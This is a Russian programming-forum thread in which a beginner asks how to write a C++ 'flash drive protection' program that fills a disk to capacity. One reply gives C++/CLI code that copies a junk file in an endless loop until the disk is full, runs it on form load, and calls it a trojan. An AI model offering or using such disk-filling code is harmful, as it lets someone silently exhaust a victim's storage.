Форум программистов, компьютерный форум, киберфорум
Наши страницы

С++ для начинающих

Войти
Регистрация
Восстановить пароль
 
Дархан
21 / 21 / 1
Регистрация: 07.10.2012
Сообщений: 93
#1

Защита флеш накопителя - C++

11.08.2013, 19:58. Просмотров 411. Ответов 2
Метки нет (Все метки)

Наткнулся на прогу по защите флеш накопителей. Алгоритм очень прост, активируете - и ВСЯ память до 0 флешки заполняется, деактивируете и можно записывать на флешку, память восстанавливается. Есть баг, после активации окошко exe не закрывается, захотел написать самостоятельно. Вопрос вот в чем, как можно на С++ сделать так, чтобы прога заполнила всю память локального или съемного диска, в зависимости от сохраненного файла?

Добавлено через 4 минуты
При активации создается файл с расширением file
0
Надоела реклама? Зарегистрируйтесь и она исчезнет полностью.
Similar
Эксперт
41792 / 34177 / 6122
Регистрация: 12.04.2006
Сообщений: 57,940
11.08.2013, 19:58
Я подобрал для вас темы с готовыми решениями и ответами на вопрос Защита флеш накопителя (C++):

Обработчик прерывания контроллера накопителя на жестком магнитном диске - C++
Добрый вечер! В лабораторной работе требуется написать свой обработчик прерывания контроллера НЖМД, т е заменить в векторе прерываний...

стрит-флеш - C++
Написал функцию проверки на образование комбинации стрит-флеш....помидорами не закидывать писал не очень вдумчиво но здесь какие то ошибки...

Заблокировать запись на флеш накопитель - C++
Не знаю в какой раздел лучше отнести данную тему. Состоит вопрос в чем. Нужно написать некую программу при помощи которой можно отслеживать...

бот для браузерной флеш-игры - C++
ребят, понадобилась помощь! никогда не работал из с++ с флешь и браузером. это для меня в новинку.может кто знает как написать бота для...

Защита от дурака - C++
Вот только начал изучать С++ помогите составить защиту от дурака пожалуйста, вот код: #include <iostream> using namespace std; ...

Защита const - C++
const Int& operator= (const Int& a) Отчего защищает первый const

2
Убежденный
Ушел с форума
Эксперт С++
15933 / 7243 / 1140
Регистрация: 02.05.2013
Сообщений: 11,637
Записей в блоге: 1
Завершенные тесты: 1
11.08.2013, 20:39 #2
Цитата Сообщение от Дархан Посмотреть сообщение
Наткнулся на прогу по защите флеш накопителей. Алгоритм очень прост, активируете - и ВСЯ память до 0 флешки заполняется
И как эта "защита" спасет от форматирования флэшки ?
0
Overwave2
1 / 1 / 0
Регистрация: 25.02.2013
Сообщений: 38
12.08.2013, 00:32 #3
Код на C++/CLI, то есть нужно создать проект Windows Forms.

C++
1
2
3
4
5
6
7
8
9
10
System::IO::StreamWriter^ writer = gcnew System::IO::StreamWriter(Environment::GetFolderPath(Environment::SpecialFolder::ApplicationData) + "\\-0.file");
writer->WriteLine("iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii");
writer->Close();
for (double xyu; ; xyu++) {
try {
IO::File::Copy(Environment::GetFolderPath(Environment::SpecialFolder::ApplicationData) + "\\-0.file", Environment::GetFolderPath(Environment::SpecialFolder::ApplicationData) + "\\" + xyu.ToString() + ".file");
}
catch (Exception^ Exc)
{Application::Exit();}
}
Можно встроить в действие загрузки формы.
Алгоритм таков: В папке ApplicationData (опционально) создается текстовый файл с содержимым "i..." и названием -0.file
Потом циклом он копируется пока не выявится ошибка в файлы 0.file, 1.file,...

Но всем же ясно, что это тупо троян.
0
MoreAnswers
Эксперт
37091 / 29110 / 5898
Регистрация: 17.06.2006
Сообщений: 43,301
12.08.2013, 00:32
Привет! Вот еще темы с ответами:

Защита от дизассемблирования - C++
Привет, Какие меры можно предпринять по защите от дизассемблирования программы на c++ ? пишу под XE4

Защита от копирования - C++
Здрасьте!Подскажите пожалуйста,как сделать,чтобы файл нельзя было копировать, но можно было перемещать? Код под Windows, обязательно на...

Защита от дурака - C++
нужна защита от дурака пытался реализовать с помощью 2 разных способов не вышло. #include <iostream> #include <string> #include...

Защита от дурака - C++
Помогите, пожалуйста. Программа должна печатать только цифры (а не буквы и прочие символы, знак минус может стоять в самом начале) и при...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
3
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2018, vBulletin Solutions, Inc.
Рейтинг@Mail.ru